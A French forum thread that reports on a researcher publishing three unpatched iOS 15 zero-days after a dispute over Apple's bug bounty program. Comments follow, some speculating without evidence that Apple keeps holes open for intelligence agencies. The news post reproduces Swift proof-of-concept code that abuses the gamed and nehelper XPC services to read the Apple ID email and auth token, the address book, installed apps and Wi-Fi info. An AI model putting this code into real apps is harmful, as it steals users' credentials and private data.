IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

  1. #1
    Chroniqueur Actualités

    Homme Profil pro
    Administrateur de base de données
    Inscrit en
    mars 2013
    Messages
    6 375
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Canada

    Informations professionnelles :
    Activité : Administrateur de base de données

    Informations forums :
    Inscription : mars 2013
    Messages : 6 375
    Points : 154 910
    Points
    154 910
    Par défaut Un chercheur publie trois vulnérabilités 0-day dans iOS 15, énervé par la gestion du Security Bounty d'Apple
    Énervé par la façon dont Apple gère son programme Security Bounty, un chercheur publie trois vulnérabilités 0-day dans iOS 15
    avec un code d'exploitation envoyé comme PoC

    Énervé par la façon dont Apple gère son programme Security Bounty, un chercheur de bogues a publié un code d'exploitation de preuve de concept pour trois vulnérabilités zero-day dans le nouveau système d'exploitation mobile iOS 15 d'Apple.

    Jeudi, sur le blog basé en Russie Habr et sous le pseudonyme IllusionOfChaos (sur Twitter il répond au même pseudonyme), le chercheur a exprimé sa frustration face à la gestion par Apple des rapports de vulnérabilité :

    « Je souhaite partager mon expérience frustrante de participation au programme Apple Security Bounty. J'ai signalé quatre vulnérabilités 0-day cette année entre le 10 mars et le 4 mai, à ce jour, trois d'entre elles sont toujours présentes dans la dernière version iOS (15.0) et une a été corrigée dans 14.7, mais Apple a décidé de la couvrir et de ne pas la mentionner sur la page de contenu de sécurité. Lorsque je les ai confrontés, ils se sont excusés, m'ont assuré que cela était dû à un problème de traitement et ont promis de le répertorier sur la page de contenu de sécurité de la prochaine mise à jour. Il y a eu trois sorties depuis lors et ils ont rompu leur promesse à chaque fois ».

    « Il y a dix jours, j'ai demandé une explication et j'ai prévenu que je rendrais mes recherches publiques si je ne reçois pas d'explication. Ma demande a été ignorée donc je fais ce que j'ai dit que je ferais. Mes actions sont conformes aux directives de divulgation responsable (Google Project Zero divulgue les vulnérabilités dans les 90 jours après les avoir signalées au fournisseur, ZDI - dans 120). J'ai attendu beaucoup plus longtemps, jusqu'à six mois dans un cas ».

    Il a rappelé qu'il n'est pas la première personne à exprimer son mécontentement dans la gestion du programme Apple Security Bounty, donnant des liens redirigeant vers les plaintes d'autres chercheurs.

    Apple a publié jeudi un correctif pour macOS Catalina afin de corriger une autre faille 0-day, après avoir effectué un exercice similaire dix jours plus tôt pour résoudre un bogue iMessage zero-clic utilisé pour cibler les militants des droits humainss.

    Les trois failles iOS non corrigées incluent :
    • Gamed 0-day, qui permet d'accéder à des données sensibles telles que l'adresse e-mail de l'identifiant Apple, le nom complet, le jeton d'authentification Apple ID associé, l'accès en lecture à une base de données de contacts partagée, la base de données de numérotation rapide et le carnet d'adresses.
    • Nehelper Enumerate Installed Apps 0-day, qui permet à toute application installée par l'utilisateur de déterminer si une autre application est installée.
    • Nehelper Wi-Fi Info 0-day, qui permet à une application disposant d'une autorisation d'accès à la localisation d'utiliser le Wi-Fi sans le droit requis.

    La faille corrigée, Analyticsd, permettait à une application installée par l'utilisateur d'accéder à un ensemble partagé de journaux d'analyse contenant des données médicales, des informations sur l'utilisation de l'appareil, des données sur les accessoires de l'appareil, des données de plantage et des paramètres de langue pour les pages Web consultées.

    Par la suite, il a donné des liens sur des dépôts GitHub contenant le code PoC qu'il a envoyé à Apple.

    Nom : deux.png
Affichages : 39806
Taille : 184,7 Ko

    Plus d'informations sur les vulnérabilités non corrigées

    Gamed 0-day

    Gamed 0-day est évidemment le bogue le plus grave, car il expose à la fois des informations personnelles identifiables (PII) et peut être utilisé dans certains cas pour pouvoir effectuer des actions sur *.apple.com qui devraient normalement être initiées par le système d'exploitation iOS lui-même ou par des interactions directes avec l'utilisateur.

    Selon lui, toute application installée à partir de l'App Store peut accéder aux données suivantes sans aucune invite de l'utilisateur :
    • Adresse e-mail de l'identifiant Apple et nom complet associé
    • Jeton d'authentification Apple ID qui permet d'accéder à au moins un des points de terminaison sur *.apple.com au nom de l'utilisateur
    • Accès complet en lecture au système de fichiers à la base de données Core Duet (contient une liste de contacts, de mails, SMS, iMessages, des applications de messagerie tierces et des métadonnées sur toutes les interactions de l'utilisateur avec ces contacts (y compris les horodatages et les statistiques), ainsi que certaines pièces jointes (comme les URL et textes)
    • Accès en lecture au système de fichiers complet à la base de données Speed Dial et à la base de données du carnet d'adresses, y compris les photos de contact et d'autres métadonnées comme les dates de création et de modification (il a précisé que, pour ce dernier point, lorsqu'il a vérifié sur iOS 15 et que celui-ci a été inaccessible, il a conclu qu'Apple dû corriger récemment ce bogue sans en informer le public)

    Voici une courte preuve de concept (celle-ci ne sera pas réellement compilée et il propose une solution de contournement sur le référentiel GitHub)

    Code Swift : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    let connection = NSXPCConnection(machServiceName: "com.apple.gamed", options: NSXPCConnection.Options.privileged)!
    let proxy = connection.remoteObjectProxyWithErrorHandler({ _ in }) as! GKDaemonProtocol
    let pid = ProcessInfo.processInfo.processIdentifier
    proxy.getServicesForPID(pid, localPlayer: nil, reply: { (accountService, _, _, _, _, _, _, _, utilityService, _, _, _, _) in
        accountService.authenticatePlayerWithExistingCredentials(handler: { response, error in
            let appleID = response.credential.accountName
            let token = response.credential.authenticationToken
        }
     
        utilityService.requestImageData(for: URL(fileURLWithPath: "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"), subdirectory: nil, fileName: nil, handler: { data in
            let addressBookData = data
        }
    }
    Chronologie :
    • 10 mars 2021 - J'ai signalé la vulnérabilité à Apple ;
    • 10 mars - Apple a reconnu avoir reçu mon rapport ;
    • 20 mai - J'ai demandé une mise à jour du statut (et je n'ai pas reçu de réponse) ;
    • 30 mai - J'ai à nouveau demandé une mise à jour de statut ;
    • 1er juillet - Apple a répondu qu'ils enquêtaient toujours ;
    • 20 juillet - J'ai à nouveau demandé une mise à jour de statut ;
    • 25 août - Apple a répondu qu'ils prévoyaient de résoudre ce problème dans la prochaine mise à jour.

    Nehelper Enumerate Installed Apps 0-day

    La vulnérabilité permet à toute application installée par l'utilisateur de déterminer si une application est installée sur l'appareil en fonction de son ID de bundle.

    Le point de terminaison XPC com.apple.nehelper a une méthode accessible à toute application qui accepte un ID de bundle en tant que paramètre et renvoie un tableau contenant des UUID de cache si l'application avec l'ID de bundle correspondant est installée sur l'appareil ou un tableau vide sinon. Cela se passe au niveau de -[NEHelperCacheManager onQueueHandleMessage:] dans /usr/libexec/nehelper.

    Code Swift : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    func isAppInstalled(bundleId: String) -> Bool {
        let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2)!
        xpc_connection_set_event_handler(connection, { _ in })
        xpc_connection_resume(connection)
        let xdict = xpc_dictionary_create(nil, nil, 0)
        xpc_dictionary_set_uint64(xdict, "delegate-class-id", 1)
        xpc_dictionary_set_uint64(xdict, "cache-command", 3)
        xpc_dictionary_set_string(xdict, "cache-signing-identifier", bundleId)
        let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
        if let resultData = xpc_dictionary_get_value(reply, "result-data"), xpc_dictionary_get_value(resultData, "cache-app-uuid") != nil {
            return true
        }
        return false
    }

    Chronologie :
    • 4 mai 2021 - J'ai signalé la vulnérabilité à Apple ;
    • 4 mai - Apple a indiqué avoir reçu mon rapport ;
    • 20 mai - J'ai demandé une mise à jour du statut (et je n'ai pas reçu de réponse) ;
    • 20 juillet - J'ai à nouveau demandé une mise à jour de statut ;
    • 12 août - Apple a répondu qu'ils enquêtaient toujours.

    Nehelper Wifi Info 0-day

    Le point de terminaison XPC com.apple.nehelper accepte le paramètre fourni par l'utilisateur sdk-version et si sa valeur est inférieure ou égale à 524288, com.apple.developer.networking.wifi-info le contrôle des droits est ignoré. Cela permet à toute application éligible (par exemple, possédant une autorisation d'accès à la localisation) d'accéder aux informations Wifi sans le droit requis. Cela se passe au niveau de -[NEHelperWiFiInfoManager checkIfEntitled:] dans /usr/libexec/nehelper.

    Code Swift : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    func wifi_info() -> String? {
        let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2)
        xpc_connection_set_event_handler(connection, { _ in })
        xpc_connection_resume(connection)
        let xdict = xpc_dictionary_create(nil, nil, 0)
        xpc_dictionary_set_uint64(xdict, "delegate-class-id", 10)
        xpc_dictionary_set_uint64(xdict, "sdk-version", 1) // may be omitted entirely
        xpc_dictionary_set_string(xdict, "interface-name", "en0")
        let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
        if let result = xpc_dictionary_get_value(reply, "result-data") {
            let ssid = String(cString: xpc_dictionary_get_string(result, "SSID"))
            let bssid = String(cString: xpc_dictionary_get_string(result, "BSSID"))
            return "SSID: \(ssid)\nBSSID: \(bssid)"
        } else {
            return nil
        }
    }

    Chronologie :
    • 2 mai 2021 - J'ai signalé la vulnérabilité à Apple ;
    • 4 mai - Apple a reconnu avoir reçu mon rapport ;
    • 20 mai - J'ai demandé une mise à jour du statut (et je n'ai pas reçu de réponse) ;
    • 20 juillet - J'ai à nouveau demandé une mise à jour de statut ;
    • 6 août - Apple a répondu qu'ils enquêtaient toujours.

    La réaction de l'industrie

    IllusionOfChaos a déclaré que la collecte de ces données montre l'hypocrisie des prétentions d'Apple à se soucier de la confidentialité. « Toutes ces données étaient collectées et disponibles pour un attaquant même si "Partager l'analyse" était désactivé dans les paramètres », a déclaré le chercheur.

    Kosta Eleftheriou, le développeur derrière l'application pour clavier Apple Watch FlickType (qui plus tôt cette année a poursuivi Apple pour abus de marché sur l'App Store), a déclaré via Twitter qu'il avait testé le Gamed 0-day sur iOS 14.8 et iOS 15 et a confirmé qu'il fonctionnait comme annoncé.

    Nom : un.png
Affichages : 5241
Taille : 20,0 Ko

    « Les bogues sont présents, mais il est peu probable qu'ils soient largement exploités », a déclaré le chercheur en sécurité Patrick Wardle, fondateur du projet de sécurité gratuit Objective See et directeur de la recherche chez Security biz Synack. « Toute application qui tenterait d'en profiter devra d'abord être approuvée par Apple, via l'App Store iOS »."

    « Pour moi, le plus important à retenir est qu'Apple livre iOS avec des bogues connus », a poursuivi Wardle, notant qu'IllusionOfChaos prétend avoir signalé les bogues il y a des mois. « Et que les chercheurs en sécurité sont tellement frustrés par le programme Apple Bug Bounty qu'ils y renoncent littéralement, refusant de l'argent (potentiel) pour publier des bogues gratuitement en ligne ».

    Wardle a déclaré qu'il considérait que la critique du chercheur du programme Security Bounty d'Apple était justifiée.

    « Ce n'est pas qu'Apple n'a pas les ressources ou l'argent pour résoudre ce problème », a-t-il tenu à préciser. « Il est clair que ce n'est tout simplement pas une priorité pour eux. À mon humble avis, la raison sous-jacente est que l'orgueil d'Apple gêne. Ils ne voient (toujours) pas les chercheurs en sécurité ou les hackers comme étant du même côté qu'eux ».

    « L'équipe de sécurité interne d'Apple comprend, mais au niveau le plus élevé, ils ont tous bu le jus de pomme, et croient que leur chemin est le bon, et ils n'ont besoin d'aucune aide externe ».

    Alors que certains développeurs ont trouvé le programme Security Bounty d'Apple gratifiant, d'autres partagent la frustration exprimée par IllusionOfChaos. En juillet 2020, Jeff Johnson, qui dirige l'entreprise d'applications Lapcat Software, a rendu public une vulnérabilité de contournement de la confidentialité parce qu'Apple n'a pas réussi à corriger. À l'époque, a-t-il déclaré, « parler à Apple Product Security, c'était comme s'adresser à un mur de briques ».

    Source : billet du chercheur

    Et vous ?

    Quelle lecture faites-vous de la situation ?
    Partagez-vous l'opinion du chercheur qui pense qu'Apple ne considère pas les chercheurs en sécurité comme étant de son côté ?
    Que pensez-vous du fait de publier les vulnérabilités et les PoC après un certain délai si l'entreprise manque à corriger la faille ?

    Voir aussi :

    Apple a bloqué le clavier FlickType Watch disant que les claviers ne sont pas autorisés sur l'Apple Watch, puis a annoncé un clone de celui-ci sur le dispositif
    Apple licencie Ashley Gjøvik qui a dénoncé le harcèlement dont elle était victime, Apple l'accuse d'avoir fait fuiter des informations confidentielles
    Contribuez au club : Corrections, suggestions, critiques, ... : Contactez le service news et Rédigez des actualités

  2. #2
    Membre émérite
    Profil pro
    undef
    Inscrit en
    février 2013
    Messages
    768
    Détails du profil
    Informations personnelles :
    Localisation : France, Lot (Midi Pyrénées)

    Informations professionnelles :
    Activité : undef

    Informations forums :
    Inscription : février 2013
    Messages : 768
    Points : 2 650
    Points
    2 650
    Par défaut
    Si Apple se met à corriger toutes les failles de leurs produits, leurs clients vont être plus bombardés de mises-à-jour que les utilisateurs Windows.

  3. #3
    Membre extrêmement actif
    Homme Profil pro
    Inscrit en
    janvier 2014
    Messages
    1 205
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations forums :
    Inscription : janvier 2014
    Messages : 1 205
    Points : 4 500
    Points
    4 500
    Par défaut
    Les utilisateurs d'iOS sont assez remontés contre Apple parce qu'en gros iOS 15 c'est une béta, qui plus est pourrie de failles de sécurité.
    « L’humour est une forme d'esprit railleuse qui s'attache à souligner le caractère comique, ridicule, absurde ou insolite de certains aspects de la réalité »

  4. #4
    Membre extrêmement actif
    Avatar de Ryu2000
    Homme Profil pro
    Étudiant
    Inscrit en
    décembre 2008
    Messages
    8 380
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 33
    Localisation : France, Hérault (Languedoc Roussillon)

    Informations professionnelles :
    Activité : Étudiant

    Informations forums :
    Inscription : décembre 2008
    Messages : 8 380
    Points : 15 031
    Points
    15 031
    Par défaut
    Citation Envoyé par Stéphane le calme Voir le message
    « Je souhaite partager mon expérience frustrante de participation au programme Apple Security Bounty. J'ai signalé quatre vulnérabilités 0-day cette année entre le 10 mars et le 4 mai, à ce jour, trois d'entre elles sont toujours présentes dans la dernière version iOS (15.0) et une a été corrigée dans 14.7, mais Apple a décidé de la couvrir et de ne pas la mentionner sur la page de contenu de sécurité. Lorsque je les ai confrontés, ils se sont excusés, m'ont assuré que cela était dû à un problème de traitement et ont promis de le répertorier sur la page de contenu de sécurité de la prochaine mise à jour. Il y a eu trois sorties depuis lors et ils ont rompu leur promesse à chaque fois ».

    « Il y a dix jours, j'ai demandé une explication et j'ai prévenu que je rendrais mes recherches publiques si je ne reçois pas d'explication. Ma demande a été ignorée donc je fais ce que j'ai dit que je ferais. Mes actions sont conformes aux directives de divulgation responsable (Google Project Zero divulgue les vulnérabilités dans les 90 jours après les avoir signalées au fournisseur, ZDI - dans 120). J'ai attendu beaucoup plus longtemps, jusqu'à six mois dans un cas ».
    Je ne comprend pas pourquoi Apple n'a pas corrigé les failles, ça n'a aucun sens.
    Keith Flint 1969 - 2019

  5. #5
    Membre actif
    Profil pro
    Inscrit en
    mars 2012
    Messages
    67
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : mars 2012
    Messages : 67
    Points : 245
    Points
    245
    Par défaut
    Peut-être que son énervement vient du fait que tant que le statut n'est pas en résolu il ne touche pas d'argent sur la découverte des failles.

  6. #6
    Membre confirmé
    Homme Profil pro
    retraité
    Inscrit en
    septembre 2014
    Messages
    269
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Paris (Île de France)

    Informations professionnelles :
    Activité : retraité

    Informations forums :
    Inscription : septembre 2014
    Messages : 269
    Points : 627
    Points
    627
    Par défaut
    Une fois de plus, le pomme était pourrie de l'intérieur.

  7. #7
    Expert éminent sénior
    Avatar de Médinoc
    Homme Profil pro
    Développeur informatique
    Inscrit en
    septembre 2005
    Messages
    27 222
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 37
    Localisation : France

    Informations professionnelles :
    Activité : Développeur informatique
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : septembre 2005
    Messages : 27 222
    Points : 40 919
    Points
    40 919
    Par défaut
    Je ne comprends plus du tout ce que signifie l'appellation "0-day", surtout si on applique encore ce qualificatif 90 jours plus tard...
    SVP, pas de questions techniques par MP. Surtout si je ne vous ai jamais parlé avant.

    "Aw, come on, who would be so stupid as to insert a cast to make an error go away without actually fixing the error?"
    Apparently everyone.
    -- Raymond Chen.
    Traduction obligatoire: "Oh, voyons, qui serait assez stupide pour mettre un cast pour faire disparaitre un message d'erreur sans vraiment corriger l'erreur?" - Apparemment, tout le monde. -- Raymond Chen.

  8. #8
    Membre actif Avatar de pascaldm
    Profil pro
    Expert sécurité informatique
    Inscrit en
    février 2013
    Messages
    48
    Détails du profil
    Informations personnelles :
    Localisation : France, Paris (Île de France)

    Informations professionnelles :
    Activité : Expert sécurité informatique
    Secteur : High Tech - Opérateur de télécommunications

    Informations forums :
    Inscription : février 2013
    Messages : 48
    Points : 219
    Points
    219
    Par défaut Politique de la Pomme
    Apple est réputé pour cet "aveuglement". La recherche de vulnérabilités (bug bounty) n'est pas payant avec Apple. Cet état de fait profite aux acteurs comme Zerodium (société de trading de 0-days) qui paient très bien les exploits premium surtout sur iOS, pour les revendre aux agences de renseignements, surtout Américaines, sous forme de PoC d'exploits prêt à l'emploi avec spécifications associées. Les TOP exploits chez Zerodium sont vendus en exclusivité aux services US.

    Zerodium a été créé en 2015 dans le Maryland à 30 minute du siège de la NSA , par Chaouki Bekrar, fondateur de l'ex Vupen (société montpellieraine) qui avait déménagé aux US en 2013 après l'obtention de contrats exclusifs avec la NSA (ici). Depuis Vupen a fermé et Zerodium a été créé (à la différence de Vupen, chez Zerodium il n'y a plus de chercheurs de vulnérabilités pour des questions légales, seulement du trading d'exploits).

    A qui profite le comportement d'Apple ?

    Toute vulnérabilité 0-day possède une fenêtre d'exploitation réduite avant correction (ou divulgation publique). Tant que la vulnérabilité reste un 0-day (c'est à dire inconnue publiquement), elle est opérationnelle. Les meilleurs exploits sont exploités pour le cyberespionnage. Le mieux est qu'ils perdurent le plus longtemps possible....

    Dans cet esprit, la politique d'Apple est très suspecte car elle profite largement aux interceptions d'agences de renseignement sur des smartphones ou laptops Apple largement répandus parmi les décideurs politiques ou économiques sur la planète entière. Ce comportement d'Apple est sans doute voulu...

  9. #9
    Membre extrêmement actif
    Avatar de Ryu2000
    Homme Profil pro
    Étudiant
    Inscrit en
    décembre 2008
    Messages
    8 380
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 33
    Localisation : France, Hérault (Languedoc Roussillon)

    Informations professionnelles :
    Activité : Étudiant

    Informations forums :
    Inscription : décembre 2008
    Messages : 8 380
    Points : 15 031
    Points
    15 031
    Par défaut
    Citation Envoyé par pascaldm Voir le message
    Dans cet esprit, la politique d'Apple est très suspecte car elle profite largement aux interceptions d'agences de renseignement sur des smartphones ou laptops Apple largement répandus parmi les décideurs politiques ou économiques sur la planète entière. Ce comportement d'Apple est sans doute voulu...
    Apple n'a peut-être pas le choix, si il y a le gouvernement US qu'arrive avec la CIA, la NSA, et tout ce que tu veux et qui te demandes de laisser des portes dérobées et des failles, tu ne peux probablement pas refuser.
    Les services de surveillance US veulent pouvoir surveiller la terre entière.
    Keith Flint 1969 - 2019

Discussions similaires

  1. Réponses: 7
    Dernier message: 07/11/2018, 11h29
  2. Réponses: 0
    Dernier message: 13/09/2017, 11h26
  3. Réponses: 1
    Dernier message: 03/09/2016, 21h42
  4. Microsoft corrige trois failles zero-day dans Windows
    Par Hinault Romaric dans le forum Windows
    Réponses: 23
    Dernier message: 31/10/2014, 17h38
  5. Réponses: 4
    Dernier message: 08/04/2010, 22h25

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo